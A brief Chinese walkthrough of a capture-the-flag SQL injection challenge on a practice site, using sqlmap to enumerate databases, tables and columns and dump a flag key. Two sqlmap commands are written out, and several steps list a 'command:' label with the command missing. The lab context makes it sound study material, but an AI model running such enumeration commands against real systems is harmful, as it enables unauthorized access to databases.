题目地址:http://ctf5.shiyanbar.com/8/index.php?id=1
下载sqlmap,拖到python安装文件夹下面,在桌面创建sqlmap的cmd快捷方式,都不赘述。
教程开始:
1.检测注入点是否可用
命令:
2.暴库:爆出该mysql里所有数据库的名称
命令:
结果:爆出有3个数据库
3.web当前使用的数据库
命令:sqlmap.py -u "http://ctf5.shiyanbar.com/8/index.php?id=1" --current-db
结果:得到当前使用的数据库是my_db
4.列出数据库中的表
命令:sqlmap.py -u "http://ctf5.shiyanbar.com/8/index.php?id=1" -D my_db --tables
结果:my_db中有两个表
5.列出表中字段
命令:
结果:thiskey表中只有一列,k0y
6.暴字段内容
命令:
结果:得到key
